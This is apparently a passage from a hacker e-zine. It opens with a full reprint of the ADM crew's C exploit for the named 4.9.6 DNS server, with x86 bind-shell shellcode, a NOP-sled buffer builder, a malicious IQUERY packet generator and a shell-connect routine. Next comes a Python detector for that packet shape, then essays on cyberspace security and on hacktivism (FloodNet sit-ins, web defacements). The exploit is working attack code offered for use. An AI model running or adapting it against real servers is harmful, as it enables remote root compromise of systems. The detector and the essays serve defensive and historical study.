35.0 More exploits from the ADM crew
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE FROM THE ADM CREW
*
* named_v3.c improved linux x86 named 4.9.6-REL exploit
* by plaguez aka ndubee.
* thanks to napster, and prym for the shellcode
*
*/


#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
#include <getopt.h>


#define NOP 0x90
#define WAITPORT 10752


char buff[10000];

char c0de[] =
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x4c\xeb\x4c\x5e\xb0\x02\x89"
"\x06\xfe\xc8\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe"
"\xc3\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66"
"\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10"
"\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66"
"\xb3\x04\xcd\x80\xeb\x04\xeb\x4a\xeb\x50\x31\xc0\x89\x46\x04\x89"
"\x46\x08\xb0\x66\xfe\xc3\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80"
"\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb8\x2f\x62\x69"
"\x6e\x89\x06\xb8\x2f\x73\x68\x21\x89\x46\x04\x31\xc0\x88\x46\x07"
"\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5d\xff\xff\xff";

char shellcode[500];


void handle_alarm(sn)
int sn;
{
alarm(0);
signal(SIGALRM, SIG_DFL);
printf("Unable to connect: Connection timed out\n");
exit(0);
}


void addchar(char *str, char ch)
{
unsigned int len;

len = strlen(str);
str[len] = ch;
str[len + 1] = 0;
}


int ConnectServer(char *host, int port)
{
int sockdesc;
struct sockaddr_in sin;
struct hostent *he;

sin.sin_port = htons(port);
sin.sin_family = AF_INET;

he = gethostbyname(host);
if (he) {
memcpy((caddr_t) & sin.sin_addr.s_addr, he->h_addr, he->h_length);
} else {
printf("Error: gethostbyname(): Unable to resolve [%s]\n", host);
exit(-1);
}

if ((sockdesc = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("Error: socket()");
exit(-1);
}
if (connect(sockdesc, (struct sockaddr *) &sin, sizeof(sin)) < 0) {
perror("Error: connect()");
exit(-1);
}
return sockdesc;
}

void MultiplexConnection(int sockdesc)
{
int ret;
char sockbuf[2048];
fd_set readfds;

while (1) {
FD_ZERO(&readfds);
FD_SET(0, &readfds);
FD_SET(sockdesc, &readfds);
select(255, &readfds, NULL, NULL, NULL);

if (FD_ISSET(sockdesc, &readfds)) {
memset(sockbuf, 0, 2048);
ret = read(sockdesc, sockbuf, 2048);
if (ret <= 0) {
printf("Connection closed by foreign host.\n");
exit(-1);
}
printf("%s", sockbuf);
}
if (FD_ISSET(0, &readfds)) {
memset(sockbuf, 0, 2048);
read(0, sockbuf, 2048);
write(sockdesc, sockbuf, 2048);
}
}
}


int lookup_host(ra, hn, rp)
struct sockaddr_in *ra;
char *hn;
unsigned short rp;
{
ra->sin_family = AF_INET;
ra->sin_port = htons(rp);
if ((ra->sin_addr.s_addr = inet_addr(hn)) == -1) {
struct hostent *he;

if ((he = gethostbyname(hn)) != (struct hostent *) NULL) {
memcpy(&ra->sin_addr.s_addr, he->h_addr, 4);
return 1;
} else
herror("Unable to resolve hostname");
} else
return 1;
return 0;
}

void attack_bind(ra, loc)
struct sockaddr_in ra;
char *loc;
{
int sd, pktlen, sockdesc;
char keypkt[6000], rname[6000];
struct hostent *he;


if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("cannot open tcp socket");
return;
}
printf("Connecting to nameserver via TCP..");
fflush(stdout);
signal(SIGALRM, handle_alarm);
alarm(15);
if (connect(sd, (struct sockaddr *) &ra, sizeof(ra)) == -1) {
perror("Unable to connect");
close(sd);
return;
}
printf(".done.\n");
alarm(0);

if ((he = gethostbyaddr((char *) &ra.sin_addr, sizeof(ra.sin_addr), AF_INET)) == (struct hostent *) NULL)
sprintf(rname, "%s", inet_ntoa(ra.sin_addr));
else
strncpy(rname, he->h_name, sizeof(rname));


pktlen = make_keypkt(keypkt);
send_packet(sd, keypkt, pktlen);
close(sd);

printf("Attente connexion...\n");
fflush(stdout);
sleep(5);
sockdesc = ConnectServer(loc, WAITPORT);


printf("Shell found! Free to execute commands suffixed with a ';'\n");
MultiplexConnection(sockdesc);
close(sockdesc);

exit(-1);

}


int make_keypkt(pktbuf)
char *pktbuf;
{
HEADER *dnsh;
char *ptr = pktbuf;
int pktlen = 0;
unsigned long ttl = 31337;


memset(pktbuf, 0, sizeof(pktbuf));

/* fill the dns header */
dnsh = (HEADER *) ptr;
dnsh->id = htons(rand() % 65535);
dnsh->qr = 0;
dnsh->opcode = IQUERY;
dnsh->aa = 0;
dnsh->tc = 0;
dnsh->rd = 1;
dnsh->ra = 1;
dnsh->unused = 0;
/* removed for portability (it's zero already)
dnsh->pr = 0;
*/

dnsh->rcode = 0;
dnsh->qdcount = htons(0);
dnsh->ancount = htons(1);
dnsh->nscount = htons(0);
dnsh->arcount = htons(0);
pktlen += sizeof(HEADER);
ptr += sizeof(HEADER);
/* this is the domain name (nothing here) */
*(ptr++) = '\0';
pktlen++;
/* fill out the rest of the rr */

PUTSHORT(T_A, ptr);
PUTSHORT(C_IN, ptr);
PUTLONG(ttl, ptr);
PUTSHORT((strlen(buff) + 1), ptr);

memcpy(ptr + 1, buff, strlen(buff) + 1);
ptr = ptr + (strlen(buff) + 1);

pktlen += ((sizeof(short) * 3) + sizeof(long) + (strlen(buff) + 1));

return pktlen;
}

int send_packet(sd, pktbuf, pktlen)
int sd, pktlen;
char *pktbuf;
{
char tmp[2], *tmpptr;

tmpptr = tmp;
PUTSHORT(pktlen, tmpptr);
if (write(sd, tmp, 2) != 2 || write(sd, pktbuf, pktlen) != pktlen) {
perror("write failed");
return 0;
}
return 1;
}


void usage(char *pname)
{
printf("\nUsage:\t%s targethost [offset]\n", pname);
printf("\ttargethost may either be name or ip.\n\n");
}

void main(argc, argv)
int argc;
char *argv[];
{
int i;
struct sockaddr_in ra;
char *ptr;
char *endbuff;
unsigned long addr;
unsigned char jmp;

int offset = 2750; /* 2200 --> 3500 */
int bsize = 1536;

if (argc < 2) {
usage(argv[0]);
exit(1);
}
if (argc == 3)
offset += atoi(argv[2]);


strcpy(shellcode, c0de);


addr = 0xbffffff0 - offset;

printf("longueur shellcode : %i\n", strlen(c0de));
printf("taille buffer %i\n", bsize);
printf("offset %i\n", offset);
printf("adresse: 0x%lx\n", addr);

endbuff = buff + bsize;

for (ptr = buff; ptr < (endbuff - strlen(shellcode) - 8); ptr++)
*ptr = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
*((long *) ptr) = addr - 16;
*((long *) (ptr + 4)) = addr;
*(ptr + 9) = 0;

if (!lookup_host(&ra, argv[1], NAMESERVER_PORT))
return;

srand(time(NULL));
attack_bind(ra, argv[1]);
}
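Added example for the detection side, not part of the ADM code above: a small Python inspector that unframes DNS-over-TCP messages the way send_packet() frames them (2-byte length prefix) and flags the message shape make_keypkt() produces, an IQUERY (opcode 1) whose answer section carries an A record with an RDLENGTH other than 4. The sample messages are constructed inline; function and constant names are this example's own.

```python
import struct

# DNS constants (RFC 1035): opcode 1 is the obsolete inverse query, type A, class IN
OPCODE_IQUERY = 1
T_A = 1
C_IN = 1


def build_iquery(rdata):
    """Construct a message in the shape make_keypkt() emits: IQUERY opcode,
    RD and RA set, qdcount=0, ancount=1, empty owner name, A/IN RR carrying rdata."""
    flags = (OPCODE_IQUERY << 11) | (1 << 8) | (1 << 7)
    header = struct.pack("!HHHHHH", 0x1234, flags, 0, 1, 0, 0)
    rr = b"\x00" + struct.pack("!HHIH", T_A, C_IN, 31337, len(rdata)) + rdata
    return header + rr


def build_query(name):
    """Construct an ordinary standard query for an A record, for contrast."""
    header = struct.pack("!HHHHHH", 0x1234, 1 << 8, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", T_A, C_IN)


def split_tcp_dns(stream):
    """Split a DNS-over-TCP byte stream into messages (2-byte big-endian length prefix)."""
    msgs, off = [], 0
    while off + 2 <= len(stream):
        (n,) = struct.unpack("!H", stream[off:off + 2])
        off += 2
        msgs.append(stream[off:off + n])
        off += n
    return msgs


def skip_name(msg, off):
    """Return the offset just past the domain name starting at off (labels or pointer)."""
    while True:
        if off >= len(msg):
            raise ValueError("truncated name")
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:  # compression pointer: two bytes, name ends here
            return off + 2
        off += length + 1


def inspect_dns_message(msg):
    """Return a list of findings for one DNS message; empty list means nothing notable."""
    findings = []
    if len(msg) < 12:
        return ["truncated header"]
    _ident, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    opcode = (flags >> 11) & 0xF
    if opcode == OPCODE_IQUERY:
        findings.append("inverse query (opcode 1) observed")
    off = 12
    try:
        for _ in range(qd):              # question entries: name, type, class
            off = skip_name(msg, off) + 4
        for _ in range(an):              # answer RRs: name, type, class, ttl, rdlength, rdata
            off = skip_name(msg, off)
            if off + 10 > len(msg):
                findings.append("truncated resource record")
                break
            rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
            off += 10
            if rtype == T_A and rdlen != 4:
                findings.append("A record with RDLENGTH %d, expected 4" % rdlen)
            if off + rdlen > len(msg):
                findings.append("RDLENGTH exceeds message")
                break
            off += rdlen
    except ValueError as e:
        findings.append(str(e))
    return findings


if __name__ == "__main__":
    # Constructed sample: one TCP stream carrying a normal query followed by an
    # IQUERY whose A record RDATA is 1500 bytes of NOPs, the shape seen above.
    stream = b"".join(struct.pack("!H", len(m)) + m
                      for m in (build_query("example.com"), build_iquery(b"\x90" * 1500)))
    for i, m in enumerate(split_tcp_dns(stream)):
        print("message %d: %s" % (i, inspect_dns_message(m) or "ok"))
```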


=------------------------------------------------------------------------------------------------=


@HWA


*********************************************************************************************************************
* =--------------------------------------------------------------------= *
* *
* Special Section: Online civil disobedience and hacktivism *
* *
* =--------------------------------------------------------------------= *
*********************************************************************************************************************

SP.00 Intro article
~~~~~~~~~~~~~

That Wild, Wild Cyberspace Frontier

Cyberspace, like the old West, is a lawless domain of limitless possibilities--for good but also for evil. As in a frontier town, everyone with links to the
Internet is going to have to see to their own protection, at least until law and order catch up.

A Russian hacker in St. Petersburg breaks into a Citibank computer system in New York and steals more than $10 million by electronically transferring the money to
other banks around the world. Improbable? Not at all--the only remarkable aspect of the affair is that the hacker was caught and the case became public when
Citibank requested his extradition. Banks try to keep such thefts under wraps because of the bad publicity, but security experts estimate that about 36 instances of
computer intruders stealing sums of more than $1 million occur each year in Europe and the United States.

And that is just the tip of an iceberg of real and potential, civil and military, deliberate and accidental threats to the global web of interlinked computers and
communications systems. In the headlong rush to "connect," little attention is being paid to gaping holes in the security of these information networks, according to
RAND researchers Richard O. Hundley and Robert H. Anderson. "This is everybody's problem, and therefore nobody's problem; it falls through all the cracks,"
they write in Security in Cyberspace: An Emerging Challenge for Society.

The authors provide a tour of the cyberspace frontier and of the "bad guys" and dangers lurking there. They also sketch a plan to bring a modicum of order and
security to this chaotic, rapidly expanding, and essentially lawless territory.

From Printed Page to Cyberspace

More and more informational activities are going digital and electronic, they point out, with these versions often supplanting all paper records. This is true of
educational activities, the holdings of libraries, the process and results of research, engineering designs and industrial processes, the various mass information and
entertainment media (newspapers, television, movies, etc.), and all manner of private and public records.

Also moving from the printed page into cyberspace are transactional activities, involving myriad commercial business and financial transactions, the operations of
governments at all levels, political activities, and both public and private social interactions.

Activities involving the operation and control of essential physical and functional infrastructures--power grids, air traffic control systems, telecommunications and
the like--are increasingly shifting from mechanical/electrical control to electronic/software control.

And the connectivity between information systems that is at the heart of cyberspace is spreading worldwide and becoming more and more universal, with millions of
new entry points every year.

These loosely protected information networks can be attacked in a variety of ways, for a variety of purposes, the authors note: to insert false data, to steal, change or
destroy data and programs, and to disrupt, manipulate or control a system's performance. Many of these types of attack have already occurred. Two notable
examples are the "Internet Worm," which disrupted activities on the Internet in 1988, and the "Hannover Hacker," who stole information from computer files all over
the world during 1986-1988 and sold it to the KGB.

All of these hostile actions can be done surreptitiously and many can be done remotely, at a great distance from the target, via a series of interlinked computers.

Malevolent acts are not the only worry; information systems operating in cyberspace can also be brought down unintentionally. Instances of this range from a farmer
accidentally cutting a fiber-optic cable while burying a dead cow (which closed four major air-traffic control centers for over five hours in May 1991) to the software
error that caused a major breakdown in AT&T long distance service in 1992.

Who Are the Potential Villains?

The explosive expansion of cyberspace activities gives rise to a new set of vulnerabilities--for governments, the military, businesses, individuals and society as a
whole--that can be exploited by a wide spectrum of "bad guys" for a variety of motives, Hundley and Anderson contend. These include hackers, disgruntled
employees, criminals, terrorists, commercial organizations, and nations. The case of hacker Kevin Mitnick provides some insight into the first type. He led authorities
on a high-speed chase through cyberspace after lifting 20,000 credit card numbers from various computer systems. Mitnick did not try to cash in on the ill-gotten
bonanza, apparently more interested in thrills than profits, and was caught only after deliberately provoking the attention of a top computer security expert. Mitnick
hacked into the files of Tsutomu Shimomura, who then tracked him down for authorities.

The resources required to cause harm in this cyberspace world are relatively small: one (or at most a few) computer experts with computer terminals hooked into the
worldwide network can do considerable damage. The resources required for a nation or group to do significant damage to the military, economy, or society of
another nation are larger, but far fewer than those required to acquire and use major weapon systems. The preparations can also be well hidden, if done carefully. As
more and more people become "computer smart" and as villains of many different stripes become more and more aware of the opportunities for mayhem in
cyberspace, the resources for major attacks could be within the reach of many nations and some malevolent groups.

To further complicate matters, cyberspace attacks mounted by these different actors are indistinguishable from each other, as are attacks mounted by domestic and
foreign-based perpetrators, insofar as the perceptions of the victims are concerned. The distinction between "crime" and "warfare," "accident" and "attack," becomes
blurred as does the distinction between police and military responsibilities.

In the authors' view, the danger of more (and more serious) threats in cyberspace is multiplying alarmingly. Statistics support their concern. The number of reported
(many incidents go unreported) Internet penetrations rose from six in 1988 to 1,172 in the first six months of 1994. So far, at least, no major disasters have
occurred, but the potential certainly exists. For example, it might be possible in the future for some perpetrators (nations or major terrorist groups) to inflict
substantial damage by bringing down key parts of the nation's air traffic control system, or the electric power grid, or the international monetary transfer system, even
if for a limited time.

Nor is a military disaster out of the question. If an enemy cyberspace attack disrupted a vital military logistics system, or the telecommunications network on which it
depends, for a critical period during a campaign, the campaign could be jeopardized.

But taming this wild frontier won't be easy. In addition to the chaotic growth of cyberspace and the blurring of lines of local, national and international authority over
activities conducted there, the authors identify another problem. Many individual users neither understand nor accept the need for communal responsibility in
safeguarding cyberspace.

In suggesting the elements of a strategy for cyberspace security, Hundley and Anderson draw on a familiar metaphor. Like frontier towns, let each local enclave
(business, university, research organization, government agency) see to its own protection, at least for the present, relying on available computer security software
and firewalls (security strategies that control electronic access by outsiders but allow insiders, who presumably are trustworthy, to travel the information highways
and byways with comparative freedom). But these are little more than stopgap measures, the authors conclude. Barring a technological breakthrough that is not now
on the horizon, effective control of cyberspace will require a combination of laws, regulations, the education and training of users, and the cooperation of countries
worldwide.


Security in Cyberspace: An Emerging Challenge for Society, by Richard O. Hundley and Robert H. Anderson, 1994.


SP.01 Article 1:"Electronic Civil Disobedience and the World Wide Web of Hacktivism: "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Electronic Civil Disobedience and the World Wide Web of Hacktivism:
A Mapping of Extraparliamentarian Direct Action Net Politics

_____________________

Stefan Wray

Source: http://www.freespeech.org/resistance/texts/hacktivism.html


Introduction

In the next century, when cyber-historians look back to the 1990s, they will recognize 1995 as the year of the graphical browser, the
year the Internet began to be overshadowed by the Web. But they will probably also view 1998 as an important moment -- in the history
of the browser wars. At a minimum, 1998 will be noted for the emergence of two terms that represent similar phenomena: electronic
civil disobedience and hacktivism. In that year, a Net based affinity group called the Electronic Disturbance Theater pushed and
agitated for new experimentation with electronic civil disobedience actions aimed mostly at the Mexican government. It engaged its
FloodNet software and invited participation to an international set of artists, digerati, and political activists to make a "symbolic gesture" in
support of Mexico's Zapatistas. At the same time, in Britain, in Australia, in India, in China, on almost every continent there were
reports of hacktivity. In the spring of 1998, a young British hacker known as "JF" accessed about 300 web sites and placed anti-nuclear
text and imagery. He entered, changed and added HTML code. At that point it was the biggest political hack of its kind. Since then, and
increasingly over the course of the year, there were numerous reports of web sites being accessed and altered with political content.

Taken together we may consider both the more symbolic electronic civil disobedience actions and the more tangible hacktivist events
under the rubric of extraparliamentarian direct action Net politics, where extraparliamentarian is taken to mean politics other than
electoral or party politics, primarily the grassroots politics of social movement. By no means was 1998 the first year of the browser wars,
but it was the year when electronic civil disobedience and hacktivism came to the fore, evidenced by a front page New York Times
article on the subject by the end of October. Since then the subject has continued to move through the media sphere. 1

What this paper attempts to do is examine these emerging trends from a slightly wider angled lens. This paper puts forth five portals for
consideration: computerized activism, grassroots infowar, electronic civil disobedience, politicized hacking, and resistance to
future war. At first they were conceived as five portals into Hacktivism, but perhaps they better serve as five portals for looking at the
wider world of extraparliamentarian direct action Net politics, although that phrase is admittedly awkward. Nevertheless, these five
portals seem to provide a useful starting point for a more in-depth, yet to come, examination of the convergence of activism, art, and
computer-based communication and media. In addition to starting to define, to frame, and to contextualize contemporary hacktivity, in
terms of its roots, its lateral dimension, and its trajectivity, this paper also asks some nascent questions of a political, tactical,
technological, ethical, and legal nature and makes some preliminary claims about the likely direction of these various movements.

Computerized Activism

Computerized activism exists at the intersections of politico-social movements and computer-mediated communication. The origins of
computerized activism extend back in pre-Web history to the mid 1980s. As an example, the first version of PeaceNet appeared in early
1986. PeaceNet enabled - really for the first time - political activists to communicate with one another across international borders with
relative ease and speed. 2 The advent of newsgroup services like PeaceNet, and wider dispersal of other Bulletin Board Systems, email
lists, and gopher sites characterizes the cyber-environment within which most early on-line political activists found themselves. This largely
text-based environment persisted up until as late as 1994 and 1995, when the first GUI browsers were introduced. Even today, while
Web sites augment these earlier forms, email communication remains a central device in the international circulation of struggle and the
creation and maintenance of international solidarity networks.3

During the early to mid 1980s the subject of computer-mediated communication (CMC) was taken up by scholars in, for example,
psychology and sociology. When communication scholars began to examine CMC, and in particular when they began to assess the
juncture of political communication and CMC, a number of academic treatments of "electronic democracy" were written in which politics
is positioned narrowly within the confines of electoral or parliamentarian politics. 4 Among the earliest treatments of CMC from among
communication scholars who entertain extraparliamentarian or grassroots politics is by Downing in "Computers for Political Change." 5
Not surprisingly, PeaceNet is one of his case studies. For purposes of tracing the origins of more current cross-border email exchange
and its role in creating and maintaining international solidarity networks, Downing points to PeaceNet's establishment of international links
in 1987. Among early adopters of these means of communication were people in the 1980s anti-nuclear and Central American solidarity
movements.

By the late 1980s and the very beginning of the 1990s, the significance of cross-border, international, email communication began to be
realized. The international role of email communication, coupled to varying degrees with the use of the Fax machine, was highlighted in
both the struggles of pro-democracy Chinese students and in broader trans-national movements that led to the dissolution of the Soviet
Union. Shortly thereafter, we began to see scholarly work on this subject. Harasim’s "Global Networks: Computers and International
Communication" began to theorize about the role of international email communication in linking together the world. 6

Computerized activism remained marginal to political and social movements until the explosion of the Internet in the early to mid 1990s
and more so until the arrival of the graphical browser in 1994 and 1995. Now, in the post-Web Internet phase there is widespread use of
these media forms by a plethora of grassroots groups and other political actors in countries all over the world. 7

A common thread or understanding that runs through various types of politically based computer-mediated communication, from early
BBS systems, to email listservs, and to sophisticated Web sites with fancy bells and whistles, seems to be an overarching dominant
paradigm that privileges discourse, dialogue, discussion and open and free access. This observation becomes important when looking
more at electronic civil disobedience and politicized hacking, because it is with this dominant paradigm of the Habermasian Web that
these later forms conflict and cause friction.

So the first portal of Computerized Activism is important for understanding the roots of today’s extraparliamentarian, more direct action
focused, political CMC. It is the portal that has been with us the longest, and the portal within which most political actors on the Net feel
the most comfortable. Computerized activism, defined more purely as the use of the Internet infrastructure as a means for activists to
communicate with one another, across international borders or not, is less threatening to power than the other types of uses we see
emerging in which the Internet infrastructure is not only a means toward or a site for communication, but the Internet infrastructure itself
becomes an object or site for action. This transgression, or paradigmatic shift in thinking, of moving away from seeing the Internet
solely as a communication device to seeing it as both a communication device and a site for action, is dealt with incrementally in the next four
sections.

Grassroots Infowar

Grassroots infowar is an intensification of computerized activism. Infowar here refers to a war of words, a propaganda war. Grassroots
infowar is the first step, the first move away from the Internet as just a site for communication and the beginning of the transformation
from word to deed. Grassroots infowar actors emerge fully cognizant they are on a global stage, telepresent across borders, in many
locations simultaneously. There exists a sense of immediacy and interconnectivity at a global level. More than a mere sharing of
information and dialogue, there is a desire to push words towards action. Internet media forms become vehicles for inciting action as
opposed to simply describing or reporting.

In the early 1990s, following the U.S. directed "smart" bombardment of Iraq and following the dissolution of the Soviet Union and the
subsequent uselessness of Cold War rhetoric as a rationalization for foreign intervention, the U.S. military-intelligence community, along
with its allies in financial-corporate sectors, needed to craft a new military doctrine. Their answer was Information Warfare and the threat
of info-terrorism. State-side scholars at RAND, a think tank in Santa Monica, California, that often does the military's "thinking", set
about devising new theoretical constructs that would lay the basis for their version of Information Warfare. In 1993, under the RAND
banner, Ronfeldt and Arquilla wrote Cyberwar is Coming! This work sets out the distinctions between netwar and cyberwar and is
cited by nearly every subsequent treatment of Information Warfare theory.8 Where netwar refers more to the war of words, the
propaganda war that exists on the Internet itself, cyberwar refers to cybernetic warfare, war dependent on computers and
communications systems, the war of C4I - Command, Control, Communication, Computers, and Information.

Not long after RAND's theoretical intervention, pragmatic cases of netwar appeared. Among the most celebrated is the case of Mexico's
Zapatistas and the international community of supporters that quickly brought that struggle on to the Internet. With the global
pro-Zapatista Internet experience there began to be a rethinking or an interrogation of RAND's theoretical constructs, albeit from a more
radical grassroots perspective. Some of this recasting has been brought forth in pieces by Harry Cleaver, a professor at the University of
Texas at Austin and key person behind the Chiapas95 project, an email-based news and information distribution service. Probably
Cleaver's most well known work in this regard is "The Zapatistas and the Electronic Fabric of Struggle." 9

Despite some radical interventions and attempts to reframe dominant forms of military and intelligence Information Warfare theory, most
of the material, not surprisingly, is produced by the likes of RAND, the National Defense University, the Department of Defense, the US
Air Force, or private sector initiatives. The meme of Information Warfare seems to have spread and been promulgated largely through
network security paranoics and others keen on guarding digital property. But there are signs that Information Warfare is spreading to
other areas. This year Information Warfare hit the international digital arts community by being the main subject of the annual Ars
Electronica Festival in Linz, Austria.9

Theorizing about grassroots or bottom-up Information Warfare doesn't get nearly as much attention as the dominant models and as a
consequence there is not much written on the subject. [11] The case of the global pro-Zapatista networks of solidarity and resistance offers
a point of departure for further examination of grassroots infowar. One feature of the Zapatista experience over the course of the last 5 years
is that it has been a war of words, as opposed to a prolonged military conflict. This is not to say there isn't a strong Mexican military
presence in the state of Chiapas. Quite the contrary is true. But fighting technically ended on January 12, 1994 and since then there has
been a ceasefire and numerous attempts at negotiation. [12] What scholars, activists, and journalists, on both the left and the right, have said
is that the Zapatistas owe their survival at this point largely to a war of words. This war of words, in part, is the propaganda war that has
been successfully unleashed by Zapatista leaders like Subcomandante Marcos as well as non-Zapatista supporters throughout Mexico
and the world. Such propaganda and rhetoric has, of course, been transmitted through more traditional mass communication means, like
the newspaper La Jornada. [13] But quite a substantial component of this war of words has taken place on the Internet. Since
January 1, 1994 there has been an explosion of the Zapatista Internet presence in the forms of email Cc: lists, newsgroups, discussion
lists, and web sites. [14]

A primary distinction, then, between earlier forms of computerized activism and forms of grassroots infowar is in the degree of intensity.
Coupled with that is the degree to which the participants are noticed and seen as a force. Given the Zapatistas' relatively high profile in
Mexican society over the course of the last five years, and given the fact that they are technically a belligerent force negotiating with a
government, the Internet activity surrounding them takes on a different significance than, say, for example, the Internet activity of the
Sierra Club, Amnesty International, or other similar ventures.

An important difference is that grassroots infowar brings with it the desire to incite action and the ability to do so at a global scale. At the end
of 1997, news of the Acteal massacre in Chiapas, in which 45 indigenous people were killed, quickly spread through global
pro-Zapatista Internet networks. Within a matter of days there were protests and actions at Mexican consulates and embassies all over
the world. [15] This incident, too, is now seen as a turning point in the stance of some toward the Internet infrastructure. While prior to this
moment there had been few if any incident reports of pro-Zapatista hacktivity, following it there has been a shift, the beginning of the move
toward accepting the Internet infrastructure as both a channel for communication and a site for action.

Electronic Civil Disobedience

Acting in the tradition of non-violent direct action and civil disobedience, proponents of Electronic Civil Disobedience are borrowing the
tactics of trespass and blockade from these earlier social movements and are experimentally applying them to the Internet. A typical civil
disobedience tactic has been for a group of people to physically blockade, with their bodies, the entranceways of an opponent's office or
building or to physically occupy an opponent's office -- to have a sit-in. Electronic Civil Disobedience, as a form of mass decentered
electronic direct action, utilizes virtual blockades and virtual sit-ins. Unlike the participant in a traditional civil disobedience action, an
ECD actor can participate in virtual blockades and sit-ins from home, from work, from the university, or from other points of access to
the Net. [16]

The phrase "Electronic Civil Disobedience" was coined by a group of artists and theorists called the Critical Art Ensemble. In 1994 they
published their first book that dealt with this subject, "The Electronic Disturbance," followed two years later by "Electronic Civil
Disobedience and Other Unpopular Ideas." [16] Both of these works are devoted to a theoretical exploration of how to move protests from
the streets onto the Internet. They examine the tactics of street protest, on-the-ground disruptions and disturbance of urban infrastructure
and they hypothesize how such practices can be applied to the Internet infrastructure. [17]

Before 1998, Electronic Civil Disobedience remained largely as theoretical musings. But after the 1997 Acteal Massacre in Chiapas,
there was a shift toward a more hybrid position that views the Internet infrastructure as both a means for communication and a site for
direct action. This shift distinguishes more sharply the third portal of Electronic Civil Disobedience from the first and second portals.

Electronic Civil Disobedience is the first transgression, making Politicized Hacking the second transgression and Resistance to Future
War the third. Each succeeding transgression moves the stance toward the Internet infrastructure further away from the public sphere
model and casts it more as conflicted territory bordering on a war zone. Where the former, more discursive model is perhaps a
manifestation of Habermas's Paris Salon, the latter may have roots in the Boston Tea Party. [18]

The realization and legitimization of the Internet infrastructure as a site for word and deed opens up new possibilities for Net politics,
especially for those already predisposed to extraparliamentarian and direct action social movement tactics. In early 1998 a small group
calling themselves the Electronic Disturbance Theater had been watching other people experimenting with early forms of virtual sit-ins.
The group then created software called FloodNet and on a number of occasions has invited mass participation in its virtual sit-ins against
the Mexican government. [19]

EDT members Carmin Karasic and Brett Stalbaum created FloodNet to direct a "symbolic gesture" against an opponent's web site.
FloodNet is a Web-based Java applet that repeatedly sends browser reload commands. [20] In theory, when enough EDT participants are
simultaneously pointing the FloodNet URL toward an opponent site, a critical mass prevents further entry. In practice, this has rarely been
attained. Given this, perhaps FloodNet's power lies more in the simulated threat.

On September 9, 1998, EDT exhibited its SWARM project [21] at the Ars Electronica Festival on Information Warfare, where it launched a
three-pronged FloodNet disturbance against web sites of the Mexican presidency, the Frankfurt Stock Exchange, and the Pentagon, to
demonstrate international support for the Zapatistas, against the Mexican government, against the U.S. military, and against a symbol of
international capital. [22]

But within several hours of activating project SWARM, FloodNet was disabled. On web browsers Java coffee cups streamed quickly
across the bottom of the screen and FloodNet froze. Participants began to send email with word of trouble. Later that day a Wired
writer learned from a Department of Defense spokesperson that the DOD had taken some steps against FloodNet. At the same time, an
EDT co-founder received email that the Defense Information Systems Agency had complained about his ECD web site content. [23]

Globally, 20,000 connected to the FloodNet browser on September 9 and 10. This action reverberated through European media. It was
later picked up by Wired, ZDTV, Defense News, and National Public Radio, among others. On October 31, EDT made the front page
of the New York Times. The story continued to unfold, with more interest from the media sphere. On November 22, EDT called for
FloodNet against the School of the Americas. [24] As part of EDT's grand finale for the 1998 season, the group plans to release a public
version of FloodNet at 12:01 a.m. on January 1, 1999.

Politicized Hacking

Again mentioning Mexico, in addition to the Electronic Civil Disobedience style action directed at the surface, at the web site
entranceway, there have also been in 1998 actual hacks into Mexican government web sites where political messages have been added
to those sites. [25] This particular tactic of accessing and altering web sites seems to have been the popular tactic for this year. Probably
one of the most well known examples of this is the story of the young British hacker named "JF" who hacked into around 300 web sites
worldwide and placed anti-nuclear imagery and text. This method has been tried by a number of groups. October issues of the Ottawa
Citizen and the New York Times did a decent job of capturing a number of these examples as they described this new trend. [26]

One main distinction between most Politicized Hacking and the type of Electronic Civil Disobedience just mentioned is that while ECD
actors don’t hide their names, operating freely and above board, most political hacks are done by people who wish to remain
anonymous. It is also likely political hacks are done by individuals rather than by specific groups.

One of the reasons for the anonymity and secrecy is that the stakes are higher. Where proponents of forms of electronic civil
disobedience actions are perhaps in an ambiguous area of law, certain types of political hacks, used to varying degrees of success, are
unquestionably illegal. Few will question the legality of actually entering into an opponent's computer and adding or changing HTML
code.

This distinction speaks to a different style of organization. Because of the more secret, private, low key, and anonymous nature of the
politicized hacks, this type of activity expresses a different kind of politics. It is not the politics of mobilization, nor the politics that
requires mass participation. This is said not to pass judgement, but to illuminate that there are several important forms of direct action Net
politics already being shaped.

As touched on already, depending on the conception of politics, politicized hacking is either a recent phenomenon or one that can be
traced back to hacking's origins. For the purposes of creating a portal to look into this world of extraparliamentarian direct action Net
politics, it may be useful to consider both perspectives. There is clearly something political about early hackers' desires to make
information free. It probably would be useful to examine the history of early to mid 1980s hacking to look for more political origins of
today's hacktivism. The computerized activism of the mid to late 1980s existed alongside the first generation of hackers. There may have
been cross-over then.

